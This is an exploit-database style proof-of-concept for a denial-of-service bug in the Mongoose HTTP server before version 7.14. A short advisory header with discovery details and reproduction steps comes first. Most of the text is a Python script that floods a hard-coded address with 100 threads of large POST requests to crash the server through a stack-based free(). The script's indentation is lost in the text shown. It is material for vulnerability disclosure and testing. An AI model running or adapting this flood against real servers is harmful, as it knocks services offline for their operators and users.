Mongoose HTTP Denial of Service

# Exploit Title: Mongoose HTTP < 7.14 DDOS Stack-Based Free()
# # Exploit Title: Mongoose HTTP < 7.14 DDOS Stack-Based Free()
# Discovered by: Yehia Elghaly
# Discovered Date: 2025-06-11
# Vendor Homepage: https://mongoose.ws/
# Software Link : https://github.com/cesanta/mongoose/tree/7.14
# Tested Version: < 7.14
# Vulnerability Type: DDOS Stack-Based
# Tested on OS: Windows 10 - Windows 11

# Steps to reproduce:
# 1. - Run Mongoose < 7.14
# 2. - Run the python script - It will crash

# Note: The bug didn?t always cause a crash on the first test, you may need to run the python scripts few times that because the result of free() on a stack address is undefined behavior. Sometimes it works. Sometimes it silently corrupts memory. Sometimes the heap manager doesn?t detect it? until it?s too late.

# The Vendor had been notified and fixed the bug

#!/usr/bin/python

import requests
import threading
import time

URL = "http://192.168.166.131:8000"
THREAD_COUNT = 100
REQUESTS_PER_THREAD = 200
LARGE_BODY = "A" * 10000

def make_requests(thread_id):
for i in range(REQUESTS_PER_THREAD):
try:
r = requests.post(URL, data=LARGE_BODY, timeout=1)
print(f"[Thread {thread_id}] Request {i+1}: {r.status_code}")
except requests.exceptions.RequestException as e:
print(f"[Thread {thread_id}] Request {i+1} failed: {e}")

threads = []
start_time = time.time()
for i in range(THREAD_COUNT):
t = threading.Thread(target=make_requests, args=(i,))
t.start()
threads.append(t)

for t in threads:
t.join()

print(f"Completed in {time.time() - start_time:.2f} seconds")